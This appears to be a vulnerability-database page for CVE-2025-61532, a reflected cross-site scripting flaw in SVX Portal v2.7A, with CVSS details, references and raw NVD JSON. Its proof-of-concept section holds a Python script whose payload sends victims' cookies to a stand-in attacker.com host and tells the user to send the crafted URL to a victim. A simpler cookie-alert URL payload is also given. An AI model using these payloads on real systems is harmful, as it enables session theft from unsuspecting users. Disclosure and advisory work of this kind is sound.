Security Vulnerability Report
中文
CVE-2025-61532 CVSS 6.1 MEDIUM

CVE-2025-61532

Published: 2025-10-09 16:15:48
Last Modified: 2026-04-15 00:35:42

Description

Cross Site Scripting vulnerability in SVX Portal v.2.7A to execute arbitrary code via the TG parameter on last_heard_page.php component

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

SVX Portal v2.7A

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-61532 - SVX Portal XSS PoC # Vulnerability: Reflected XSS via TG parameter in last_heard_page.php # Affected: SVX Portal v2.7A import requests TARGET_URL = "http://target-svx-portal/last_heard_page.php" # Malicious payload injected via TG parameter # The payload executes arbitrary JavaScript in the victim's browser context payload = '<script>alert("XSS-CVE-2025-61532");document.location="http://attacker.com/steal?cookie="+document.cookie;</script>' # Construct the malicious URL params = { "TG": payload } # Send the crafted request response = requests.get(TARGET_URL, params=params) print(f"[*] Malicious URL: {response.url}") print(f"[*] Status Code: {response.status_code}") print("[*] Send this URL to a victim user to trigger the XSS vulnerability") # Alternative simple URL-based PoC: # http://target-svx-portal/last_heard_page.php?TG=<script>alert(document.cookie)</script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61532", "sourceIdentifier": "[email protected]", "published": "2025-10-09T16:15:48.017", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross Site Scripting vulnerability in SVX Portal v.2.7A to execute arbitrary code via the TG parameter on last_heard_page.php component"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://docs.meeco.me/releases/svx-1.3.0#portal", "source": "[email protected]"}, {"url": "https://github.com/bugdotexe/Vulnerability-Research/tree/main/CVE-2025-61532", "source": "[email protected]"}, {"url": "https://github.com/sa2blv/SVXportal", "source": "[email protected]"}]}}